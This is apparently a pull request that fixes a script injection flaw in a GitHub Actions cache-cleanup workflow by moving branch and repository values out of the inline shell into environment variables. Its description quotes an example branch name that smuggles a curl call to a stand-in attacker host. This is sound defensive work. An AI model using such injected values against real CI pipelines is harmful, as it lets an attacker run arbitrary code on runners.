### PR TITLE
fix: resolve template injected rce vuln in cache deletion action

### DIFF
--- a/.github/workflows/cleanup-branch-cache.yml
+++ b/.github/workflows/cleanup-branch-cache.yml
@@ -14,23 +14,21 @@ jobs:
       - name: Delete caches for closed branch
         run: |
           CACHE_IDS=$(gh cache list \
-            --repo "$REPO" \
-            --ref "refs/heads/$HEAD_REF" \
+            --repo "$GITHUB_REPOSITORY" \
+            --ref "refs/heads/$GITHUB_HEAD_REF" \
             --limit 100 \
             --json id \
             --jq '.[].id') || true
 
           if [ -z "$CACHE_IDS" ]; then
-            echo "No caches found for branch $HEAD_REF"
+            echo "No caches found for branch $GITHUB_HEAD_REF"
             exit 0
           fi
 
-          echo "Deleting caches for closed branch: $HEAD_REF"
+          echo "Deleting caches for closed branch: $GITHUB_HEAD_REF"
           echo "$CACHE_IDS" | while IFS= read -r id; do
             echo "  Deleting cache ID: $id"
-            gh cache delete "$id" --repo "$REPO" || true
+            gh cache delete "$id" --repo "$GITHUB_REPOSITORY" || true
           done
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
-          REPO: ${{ github.repository }}
-          HEAD_REF: ${{ github.head_ref }}

--- a/.github/workflows/cleanup-branch-cache.yml
+++ b/.github/workflows/cleanup-branch-cache.yml
@@ -14,21 +14,23 @@ jobs:
       - name: Delete caches for closed branch
         run: |
           CACHE_IDS=$(gh cache list \
-            --repo "${{ github.repository }}" \
-            --ref "refs/heads/${{ github.head_ref }}" \
+            --repo "$REPO" \
+            --ref "refs/heads/$HEAD_REF" \
             --limit 100 \
             --json id \
             --jq '.[].id') || true
 
           if [ -z "$CACHE_IDS" ]; then
-            echo "No caches found for branch ${{ github.head_ref }}"
+            echo "No caches found for branch $HEAD_REF"
             exit 0
           fi
 
-          echo "Deleting caches for closed branch: ${{ github.head_ref }}"
+          echo "Deleting caches for closed branch: $HEAD_REF"
           echo "$CACHE_IDS" | while IFS= read -r id; do
             echo "  Deleting cache ID: $id"
-            gh cache delete "$id" --repo "${{ github.repository }}" || true
+            gh cache delete "$id" --repo "$REPO" || true
           done
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          REPO: ${{ github.repository }}
+          HEAD_REF: ${{ github.head_ref }}


### PR DESCRIPTION
## Description

Fix script injection vulnerability in `cleanup-branch-cache workflow`

Moves `github.head_ref` and `github.repository` out of inline run: shell script into env: variables, preventing a class of script injection attack where a maliciously named branch (e.g. main"; curl attacker.com #) could execute arbitrary code on the CI runner, though only in the branch cleanup action.

No behavior change — functionally identical, just sanitized.

Tagging @fkiriakos07 

## Issue(s)

Closes [STOR-539](https://mozilla-hub.atlassian.net/browse/STOR-539).


[STOR-539]: https://mozilla-hub.atlassian.net/browse/STOR-539?atlOrigin=eyJpIjoiNWRkNTljNzYxNjVmNDY3MDlhMDU5Y2ZhYzA5YTRkZjUiLCJwIjoiZ2l0aHViLWNvbS1KU1cifQ